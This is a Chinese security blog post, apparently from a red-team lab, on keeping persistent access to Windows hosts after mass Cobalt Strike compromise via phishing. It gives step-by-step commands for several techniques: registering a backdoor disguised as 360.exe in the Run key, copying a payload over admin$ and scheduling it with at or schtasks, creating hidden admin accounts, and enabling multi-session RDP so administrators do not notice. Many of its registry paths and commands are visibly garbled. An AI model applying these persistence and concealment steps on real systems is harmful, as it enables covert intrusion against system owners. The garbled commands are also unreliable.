CobalStrike批量上线后的权限维持和信息收集~

  • A+
所属分类:安全文章

出品|MS08067实验室

本文作者:BlackCat(Ms08067内网安全小组成员)

BlackCat微信(欢迎骚扰交流):

CobalStrike批量上线后的权限维持和信息收集~

前言:

昨天做CS批量上线的时候发现,内网渗透的本质都是信息收集,也就是收集各种账号密码,一旦有了密码,这个系统也就不攻而破了。然后就在网上以及查阅资料中,整理了以下的搜集姿势。

权限维持:

比如通过钓鱼邮件,批量获取了一批上线机器,但是我们不能第上来就进行其他主机的渗透,第一步应 该进行维稳加固。

维稳方法一:加入出册表自启动

之所以放入注册表中,是由于我们后期的操作可能需要一个正常用户权限的shell,因为有些操作必须在对应的用户权限下才能正常进行,比如wmi,schtasks,net user,截屏,键盘记录等等。。

在网上翻阅了一大堆的关于这个方法的资料

参考链接:

网上大佬的脚本方法我没能实验成功,就算成功了,上传会不会被杀也不一定,所以我选择了最保守的 方法利用beacon执行cmd的命令来修改注册表:

这里用到了reg命令:eg命令是Windows提供的,它可以添加、更改和显示注册表项中的注册表子项信息和值。

首先我们要知道,注册表里开机自启动的目录是什么:

Win+R执行regedit后依次打开以下目录

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

CobalStrike批量上线后的权限维持和信息收集~


这样就能看到开机自启动的内容都有什么:

这个在cmd中的命令为

REG query "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun#显示这个目录下的所有的值

在beacon中执行就是前面加个shell

CobalStrike批量上线后的权限维持和信息收集~


可以看到成功执行:然后下一步就是添加我们的后门程序到这个目录下,个人经验,感觉这里尽量稍稍 伪装一下自己的后门程序名,有的管理员安全意识高的可能会查看,这里我把它改为360.exe

然后通过文件浏览器,把这个后门上传上去,但是一定要做好免杀,这里我上传到了 "C:WindowsTemp"目录下:

语法为:

reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionrun" /v【启bai动名】/d "【启动路径】"/f替换

上面这个会对所有用户生效,如果只想对当前用户生效,把HKEY_LOCAL_MACHINE改为 HKEY_CURRENT_USER 就可以了。

REG add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v 360 /d "C:WindowsTemp360.exe" /f

然后在beacon中执行:

CobalStrike批量上线后的权限维持和信息收集~


然后去被控机上面看是否生效:

CobalStrike批量上线后的权限维持和信息收集~


成功了 。。还有⼀条删除命令:

REG delete "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v 360 /f #删除360这个进程

CobalStrike批量上线后的权限维持和信息收集~


最后我先在cs上下了这台机器,然后重启了下这台机器,重启后发现cs直接上线,所以这步我们就此告—段落。


CobalStrike批量上线后的权限维持和信息收集~


REG query"HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"#显示这个目录下的所有的值REG add"HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"/v360/d"C:WindowsTemp360.exe" /f #把上传的后门程序设置成开机自启动REG delete"HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"/v 360/f #删除自启动

维稳方法二:加入高权限组执行计划任务

一般情况下我们获取的CS后门权限都是administrator的,

但是我们后期要弹system的shell时候,或者和域内DC机通讯的话,还是需要system权限的。最简单的提权

CobalStrike批量上线后的权限维持和信息收集~


执行完后会新上线一台机器权限为system,提权成功。

CobalStrike批量上线后的权限维持和信息收集~


但是慢慢发现,有的时候,system权限并虽然高,但是感觉还是不适合我们操作,有些命令还是administrator权限执行可以,比如wmi,schtasks,netuse r,截屏,键盘记录等

这里就在继续说一下

维稳方法三:Windows的计划任务(schtasks)

简介:

计划任务,顾名思义,指定时间做指定的事情,对windows来说可能是执行脚本,也可能是exe。计划任务的利用不仅仅在横向渗透中,也可以是在权限维持。

利用前提:

1.必须通过其他手段拿到本地或者域管理账号密码

2.若在横向渗透过程中,要保证当前机器能netuse远程到目标机器上

3.目标机器开启了taskscheduler服务

测试:

对于XP或者2003以下的机器,基本都是用at来管理本地或者远程机器上的计划任务。这里没有搭建03的机器,就简单的列一下命令,解释一下。

ne tuse \192.168.1.101admin$ /user:"administrator" admin #netuse 连接

net time \192.168.1.101 #查看远程主机时间

xcopyc:payload.exe \192.168.1.101admin$temp 

# 拷贝payload至0远程主机对应目录下

at\192.168.1.10119:30 /every:5,10,15,20,25,30c:windowstemppayload.exe

#设定计划任务,每月5,10,15,20,25,30日的19:30执行命令运行payload

设置完计划任务后可以通过以下命令查看:

at \192.168.1.101

删除任务的话只需要加上参数/delete即可。这样会在指定日期的晚上七点半返回一个会话。

在win7后的版本就有了个新的功能,schtasks计划任务:

CobalStrike批量上线后的权限维持和信息收集~


比如我要在十点后启用这个这个后门。

schtasks/create /tn "360"/trC:WindowsTemp360.exe /sc DAILY /st 10:00

/tn任务名(自定义)/tr目录,也可以是执行的命令
schtasks/query /tn 360/v schtasks /query|findstr "360"
#查询创建的任务       
schtasks/run /tn 360
#立即运行创建的任务  
schtasks/delete /tn 360
#删除任务
CobalStrike批量上线后的权限维持和信息收集~

CobalStrike批量上线后的权限维持和信息收集~


参考:

说了这么多,感觉比较麻烦,那我们直接运行不就好了么,其实不然,有些安全软件,会识别你的行为,阻止你去执行某些操作,但是计算机执行的操作则不会被拦截,所以也常用于内网中的bypass。

维稳方法四:创建隐藏用户

简介:

隐藏用户也叫影子用户,创建一个无法用用户本机用户罗列工具显示的用户,并且赋予管理员权限。所有操作需要有管理员权限。同时测试在windowsserver 2012服务器域环境下影子账户无法直接进行添加。

详细操作步骤参考网上资料;

维稳方法五:多地登陆管理员账号不被发现

这个是我一个朋友告诉我的方法,他在护网时候权限丢失就是远程登陆administrato r账号的时候,被管理员发现,然后关机了,导致权限丢失,那么如何解决这个问题。这个执行起来也很简单

还是修改注册表:

首先线以此打开注册表中的文件

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerfSingleSessionPerUser

双击打开这个文件,看里面的数值数据为0还是1

为1是不允许多地远程,

为0,是允许03以上的系统基本上默认都是为1不允许所以这里就需要我们更改这个

CobalStrike批量上线后的权限维持和信息收集~


之后再多个终端远程这台主机就不会有提示了。

总结:

我这里只是简单介绍了一些CS的简单使用,没有涉及到各种杀软的绕过,CS的提权插件以及内网主机搜集插件等,还有就是CS后门免杀技术。我也在正在学习后门免杀技术,后续如果可能在做分享。

维稳方法还有很多,这里就先介绍这些吧,CS上线只是内网渗透的一个开始,本人也是初学者,文中如果哪里存在纰漏,敬请大佬们批评指正。


内网小组持续招人,扫描二维码加入我们!

CobalStrike批量上线后的权限维持和信息收集~



扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

CobalStrike批量上线后的权限维持和信息收集~ CobalStrike批量上线后的权限维持和信息收集~

CobalStrike批量上线后的权限维持和信息收集~CobalStrike批量上线后的权限维持和信息收集~

CobalStrike批量上线后的权限维持和信息收集~ CobalStrike批量上线后的权限维持和信息收集~

目前35000+人已关注加入我们

CobalStrike批量上线后的权限维持和信息收集~

本文始发于微信公众号(Ms08067安全实验室):CobalStrike批量上线后的权限维持和信息收集~

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: